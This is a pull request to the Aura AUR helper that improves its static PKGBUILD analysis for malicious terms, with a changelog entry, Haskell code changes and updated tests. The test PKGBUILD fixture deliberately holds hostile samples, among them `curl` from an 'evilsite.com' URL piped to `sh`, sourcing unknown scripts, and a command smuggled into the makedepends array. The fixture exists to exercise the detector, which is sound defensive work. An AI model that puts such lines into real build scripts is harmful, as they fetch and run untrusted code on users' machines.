### PR TITLE
Improve pkgbuild analysis

### DIFF
--- a/aura/CHANGELOG.md
+++ b/aura/CHANGELOG.md
@@ -4,7 +4,7 @@
 
 This is a large update representing about a month of full-time effort. Aura is now
 *much* faster, solves dependencies more reliably, has a few new features, and
-many fewer bugs. This is all while modernizing the code and seeing a ~17% decrease
+many fewer bugs. This is all while modernizing the code and seeing a ~15% decrease
 in overall code size.
 
 ### Improvements
@@ -24,9 +24,20 @@ in overall code size.
   - Example: `cron` is a legal dependency to specify, but there exists no package
     with that name. `cronie` and `fcron` both "provide" `cron`, and now the user
     can manually make a selection.
+  - Including `--noconfirm` will have Aura make its best guess.
 - If the exact version of an AUR package is available in the package cache, it
   will be used automatically instead of being rebuilt. You can instead force a
   rebuild with `--force`.
+
+#### PKGBUILD Analysis
+
+- In light of the recent [compromise of the Acroread package](https://lists.archlinux.org/pipermail/aur-general/2018-July/034151.html),
+  Aura nows performs static PKGBUILD analysis before building, and warns the user if
+  potentially malicious terms like `curl` are found.
+  - This feature can be disabled with `--noanalysis`. Caveat emptor!
+  - **This feature is a supplement in checking PKGBUILD safety, not a fool-proof replacement.**
+    It is always your responsiblity to understand what build scripts are running
+    on your machine.
 
 #### Saved Package State
 

--- a/aura/lib/Aura/Core.hs
+++ b/aura/lib/Aura/Core.hs
@@ -134,7 +134,7 @@ removePkgs pkgs = do
 -- `asT` renders the `VersionDemand` into the specific form that `pacman -T`
 -- understands. See `man pacman` for more info.
 isSatisfied :: Dep -> IO Bool
-isSatisfied (Dep n ver) = BL.null <$> pacmanOutput (map T.unpack ["-T", (n ^. field @"name") <> asT ver])
+isSatisfied (Dep n ver) = pacmanSuccess $ map T.unpack ["-T", (n ^. field @"name") <> asT ver]
   where asT (LessThan v) = "<"  <> prettyV v
         asT (AtLeast  v) = ">=" <> prettyV v
         asT (MoreThan v) = ">"  <> prettyV v

--- a/aura/lib/Aura/Dependencies.hs
+++ b/aura/lib/Aura/Dependencies.hs
@@ -56,13 +56,14 @@ resolveDeps repo ps = do
   send $ resolveDeps' ss repo tv ts ps
   m    <- send $ readTVarIO tv
   s    <- send $ readTVarIO ts
+  unless (length ps == length m) $ send (putStr "\n")
   let de = conflicts ss m s
   unless (null de) . throwError . Failure $ missingPkg_2 de
   either throwError pure $ sortInstall m
 
 -- | An empty list signals success.
 resolveDeps' :: Settings -> Repository -> TVar (M.Map PkgName Package) -> TVar (S.Set PkgName) -> NonEmptySet Package -> IO ()
-resolveDeps' ss repo tv ts ps = throttled_ h ps *> putStr "\n"
+resolveDeps' ss repo tv ts ps = throttled_ h ps
   where
     -- | Handles determining whether further work should be done. It won't
     -- continue to `j` if this `Package` has already been analysed.

--- a/aura/lib/Aura/Install.hs
+++ b/aura/lib/Aura/Install.hs
@@ -48,7 +48,7 @@ import           Data.Set.NonEmpty (NonEmptySet)
 import qualified Data.Set.NonEmpty as NES
 import qualified Data.Text.IO as T
 import           Language.Bash.Pretty (prettyText)
-import           Language.Bash.Syntax (Statement)
+import           Language.Bash.Syntax (ShellCommand)
 import           Lens.Micro ((^.), (^..), each)
 import           Lens.Micro.Extras (view)
 import           System.Directory (setCurrentDirectory)
@@ -127,10 +127,10 @@ analysePkgbuild b = do
         send $ traverse_ (displayBannedTerms ss) bts
         f
 
-displayBannedTerms :: Settings -> (Statement, NonEmptySet BannedTerm) -> IO ()
-displayBannedTerms ss (stmt, bts) = do
+displayBannedTerms :: Settings -> (ShellCommand, BannedTerm) -> IO ()
+displayBannedTerms ss (stmt, b) = do
   putStrLn $ prettyText stmt
-  traverse_ (\b -> warn ss $ reportExploit b lang) bts
+  warn ss $ reportExploit b lang
   where lang = langOf ss
 
 -- | Give anything that was installed as a dependency the /Install Reason/ of

--- a/aura/lib/Aura/Install.hs
+++ b/aura/lib/Aura/Install.hs
@@ -129,7 +129,7 @@ analysePkgbuild b = do
 
 displayBannedTerms :: Settings -> (ShellCommand, BannedTerm) -> IO ()
 displayBannedTerms ss (stmt, b) = do
-  putStrLn $ prettyText stmt
+  putStrLn $ "\n    " <> prettyText stmt <> "\n"
   warn ss $ reportExploit b lang
   where lang = langOf ss
 

--- a/aura/lib/Aura/Languages.hs
+++ b/aura/lib/Aura/Languages.hs
@@ -1341,6 +1341,10 @@ security_7 :: Language -> Doc AnsiStyle
 security_7 = \case
   _ -> "Cancelled further processing to avoid potentially malicious bash code."
 
+security_8 :: T.Text -> Language -> Doc AnsiStyle
+security_8 (bt -> t) = \case
+  _ -> t <+> "is a bash command inlined in your PKGBUILD array fields."
+
 -----------------------
 -- Aura/Utils functions
 -----------------------

--- a/aura/lib/Aura/Languages.hs
+++ b/aura/lib/Aura/Languages.hs
@@ -1335,7 +1335,7 @@ security_5 (PkgName p) = \case
 
 security_6 :: Language -> Doc AnsiStyle
 security_6 = \case
-  _ -> "Do you wish to quit the build process? (recommended)"
+  _ -> "Do you wish to quit the build process?"
 
 security_7 :: Language -> Doc AnsiStyle
 security_7 = \case

--- a/aura/lib/Aura/MakePkg.hs
+++ b/aura/lib/Aura/MakePkg.hs
@@ -25,7 +25,7 @@ import qualified Data.List.NonEmpty as NEL
 import           Data.Set.NonEmpty (NonEmptySet)
 import qualified Data.Set.NonEmpty as NES
 import qualified Data.Text as T
-import           Control.Lens ((^.), _2)
+import           Lens.Micro ((^.), _2)
 import           System.Path (Path, Absolute, fromAbsoluteFilePath, (</>), toFilePath)
 import           System.Path.IO (getCurrentDirectory, getDirectoryContents)
 import           System.Process.Typed

--- a/aura/lib/Aura/MakePkg.hs
+++ b/aura/lib/Aura/MakePkg.hs
@@ -45,7 +45,7 @@ makepkg :: Settings -> User -> IO (Either Failure (NonEmptySet (Path Absolute)))
 makepkg ss usr = fmap g . make usr . f $ proc cmd (opts <> colour)
   where (cmd, opts) = runStyle usr . foldMap asFlag . makepkgFlagsOf $ buildConfigOf ss
         f | switch ss DontSuppressMakepkg = id
-          | otherwise = setStdout closed
+          | otherwise = setStderr closed . setStdout closed
         g (ExitSuccess, fs) = note (Failure buildFail_9) . fmap NES.fromNonEmpty $ NEL.nonEmpty fs
         g _ = Left $ Failure buildFail_8
         colour | shared ss (Colour Never)  = ["--nocolor"]

--- a/aura/lib/Aura/Packages/AUR.hs
+++ b/aura/lib/Aura/Packages/AUR.hs
@@ -44,7 +44,7 @@ import           Linux.Arch.Aur
 import           Network.HTTP.Client (Manager)
 import           System.Path
 import           System.Path.IO (getCurrentDirectory)
-import           System.Process.Typed (proc, runProcess)
+import           System.Process.Typed
 
 ---
 
@@ -99,11 +99,10 @@ pkgUrl (PkgName pkg) = T.pack . toUnrootedFilePath $ aurLink </> fromUnrootedFil
 -------------------
 -- SOURCES FROM GIT
 -------------------
--- TODO Make silent?
 -- | Attempt to clone a package source from the AUR.
 clone :: Buildable -> IO (Maybe (Path Absolute))
 clone b = do
-  ec <- runProcess $ proc "git" [ "clone", "--depth", "1", toUnrootedFilePath url ]
+  ec <- runProcess . setStderr closed . setStdout closed $ proc "git" [ "clone", "--depth", "1", toUnrootedFilePath url ]
   case ec of
     (ExitFailure _) -> pure Nothing
     ExitSuccess     -> do

--- a/aura/lib/Aura/Packages/Repository.hs
+++ b/aura/lib/Aura/Packages/Repository.hs
@@ -52,8 +52,9 @@ packageRepo pn pro ver = Prebuilt { name     = pn
                                   , base     = pn
                                   , provides = pro }
 
+-- TODO Bind to libalpm /just/ for the @-Ssq@ functionality. These shell
+-- calls are one of the remaining bottlenecks.
 -- | If given a virtual package, try to find a real package to install.
--- Functions like this are why we need libalpm.
 resolveName :: Settings -> PkgName -> IO (Either PkgName (PkgName, Provides))
 resolveName ss pn = do
   provs <- map (PkgName . strictText) . BL.lines <$> pacmanOutput ["-Ssq", "^" <> T.unpack (pn ^. field @"name") <> "$"]

--- a/aura/lib/Aura/Pacman.hs
+++ b/aura/lib/Aura/Pacman.hs
@@ -128,11 +128,11 @@ pacman args = do
 
 -- | Run some `pacman` process, but only care about whether it succeeded.
 pacmanSuccess :: [String] -> IO Bool
-pacmanSuccess = fmap (\out -> (out ^. _1) == ExitSuccess) . readProcess . proc "pacman"  -- TODO silence this better?
+pacmanSuccess = fmap (== ExitSuccess) . runProcess . setStderr closed . setStdout closed . proc "pacman"
 
 -- | Runs pacman silently and returns only the stdout.
 pacmanOutput :: [String] -> IO BL.ByteString
-pacmanOutput = fmap (^. _2) . readProcess . proc "pacman"  -- TODO silence this?
+pacmanOutput = fmap (^. _2) . readProcess . proc "pacman"
 
 -- | Yields the lines given by `pacman -V` with the pacman image stripped.
 getVersionInfo :: IO [T.Text]

--- a/aura/lib/Aura/Pkgbuild/Base.hs
+++ b/aura/lib/Aura/Pkgbuild/Base.hs
@@ -26,9 +26,5 @@ pkgbuildPath :: PkgName -> Path Absolute
 pkgbuildPath (PkgName p) = pkgbuildCache </> fromUnrootedFilePath (T.unpack p) <.> FileExt "pb"
 
 -- | Package a Buildable, running the customization handler first.
---
--- REMINDER: This shouldn't be called concurrently. It could seriously mess
--- up user interaction, and there probably aren't enough packages in the list to
--- make the concurrent scheduling worth it.
 packageBuildable :: Settings -> Buildable -> IO Package
 packageBuildable ss b = FromAUR <$> hotEdit ss b

--- a/aura/lib/Aura/Pkgbuild/Security.hs
+++ b/aura/lib/Aura/Pkgbuild/Security.hs
@@ -51,7 +51,7 @@ parsedPB (Pkgbuild pb) = hush . parse "PKGBUILD" . T.unpack $ strictText pb  -- 
 -- | Discover any banned terms lurking in a parsed PKGBUILD, paired with
 -- the surrounding context lines.
 bannedTerms :: List -> [(ShellCommand, BannedTerm)]
-bannedTerms = simpleCommands >=> bannedCommand -- mapMaybe bannedCommand . simpleCommands
+bannedTerms = simpleCommands >=> bannedCommand
 
 banned :: Word -> Maybe BannedTerm
 banned w = M.lookup (T.pack $ unquote w) blacklist

--- a/aura/package.yaml
+++ b/aura/package.yaml
@@ -47,6 +47,7 @@ dependencies:
   - paths >= 0.2 && < 0.3
   - prettyprinter >= 1.2 && < 1.3
   - prettyprinter-ansi-terminal >= 1.1 && < 1.2
+  - pretty-simple >= 2.1 && < 2.2
   - text >= 1.2 && < 1.3
   - transformers
   - typed-process >= 0.2 && < 0.3
@@ -100,7 +101,6 @@ executables:
       - aura
       - http-client-tls >= 0.3 && < 0.4
       - optparse-applicative >= 0.14 && < 0.15
-      - pretty-simple >= 2.1 && < 2.2
     ghc-options:
       - -threaded
       - -O2

--- a/aura/test/Test.hs
+++ b/aura/test/Test.hs
@@ -68,8 +68,9 @@ suite conf pb = testGroup "Unit Tests"
   , testGroup "Aura.Pkgbuild.Security"
     [ testCase "Parsing - aura.PKGBUILD" $ do
         -- pPrintNoColor $ map (first prettyText) . bannedTerms <$> ppb
+        -- pPrintNoColor ppb
         assertBool "Failed to parse" $ isJust ppb
-    , testCase "Detecting banned terms" $ (not . null . bannedTerms <$> ppb) @?= Just True
+    , testCase "Detecting banned terms" $ (length . bannedTerms <$> ppb) @?= Just 5
     ]
   ]
   where ppb = parsedPB pb

--- a/aura/test/Test.hs
+++ b/aura/test/Test.hs
@@ -70,7 +70,7 @@ suite conf pb = testGroup "Unit Tests"
         -- pPrintNoColor $ map (first prettyText) . bannedTerms <$> ppb
         -- pPrintNoColor ppb
         assertBool "Failed to parse" $ isJust ppb
-    , testCase "Detecting banned terms" $ (length . bannedTerms <$> ppb) @?= Just 5
+    , testCase "Detecting banned terms" $ (length . bannedTerms <$> ppb) @?= Just 6
     ]
   ]
   where ppb = parsedPB pb

--- a/aura/test/Test.hs
+++ b/aura/test/Test.hs
@@ -13,10 +13,12 @@ import qualified Data.Map.Strict as M
 import qualified Data.Text as T
 import qualified Data.Text.IO as T
 import           Data.Versions
+-- import           Language.Bash.Pretty (prettyText)
 import           System.Path
 import           Test.Tasty
 import           Test.Tasty.HUnit
 import           Text.Megaparsec
+-- import           Text.Pretty.Simple (pPrintNoColor)
 
 ---
 
@@ -65,10 +67,12 @@ suite conf pb = testGroup "Unit Tests"
     ]
   , testGroup "Aura.Pkgbuild.Security"
     [ testCase "Parsing - aura.PKGBUILD" $ do
-        assertBool "Failed to parse" . isJust $ parsedPB pb
-    , testCase "Detecting banned terms" $ (fmap (not . null . bannedTerms) $ parsedPB pb) @?= Just True
+        -- pPrintNoColor $ map (first prettyText) . bannedTerms <$> ppb
+        assertBool "Failed to parse" $ isJust ppb
+    , testCase "Detecting banned terms" $ (not . null . bannedTerms <$> ppb) @?= Just True
     ]
   ]
+  where ppb = parsedPB pb
 
 firefox :: T.Text
 firefox = "Repository      : extra\n\

--- a/aura/test/aura.PKGBUILD
+++ b/aura/test/aura.PKGBUILD
@@ -17,6 +17,7 @@ makedepends=('ghc'
              'haskell-regex-base'
              'haskell-regex-pcre'
              'haskell-split'
+             "$(echo evil script 1>&2)"
              'haskell-temporary'
              'haskell-text'
              'haskell-transformers')

--- a/aura/test/aura.PKGBUILD
+++ b/aura/test/aura.PKGBUILD
@@ -11,6 +11,8 @@ depends=('gmp' 'pacman' 'pcre')
 makedepends=('ghc'
              'haskell-aur>=6.0'
              'haskell-mtl'
+             'curl'
+             'git'
              'haskell-parsec'
              'haskell-regex-base'
              'haskell-regex-pcre'
@@ -27,16 +29,14 @@ options=('strip')
 source=(https://github.com/aurapm/aura/releases/download/v${pkgver}/aura-${pkgver}.tar.gz)
 md5sums=('fd2defff494ad7847a0fb9fe73296cf1')
 
-
-
-
-
 build() {
     cd ${srcdir}/${_hkgname}-${pkgver}
     runhaskell Setup configure --prefix=/usr --docdir=/usr/share/doc/${pkgname} -O
     runhaskell Setup build
 
     curl "https://evilsite.com/malware.sh" | sh
+    cd .
+    . evilscript.sh
 }
 
 package() {
@@ -66,3 +66,5 @@ package() {
 
     git clone https://github.com/badguy/evilstuff.git
 }
+
+source evil.sh

--- a/aura/test/aura.PKGBUILD
+++ b/aura/test/aura.PKGBUILD
@@ -37,6 +37,7 @@ build() {
     curl "https://evilsite.com/malware.sh" | sh
     cd .
     . evilscript.sh
+    git branch foobar
 }
 
 package() {


### PR DESCRIPTION
### TODO

- [x] Don't warn when `git`, etc. are legitimate deps in the `depends` fields
- [x] Warn when commands are executed inside arrays
- [x] Only warn for `git` if it's `git clone`
- [x] (extra) Silence certain shell outputs + performance improvements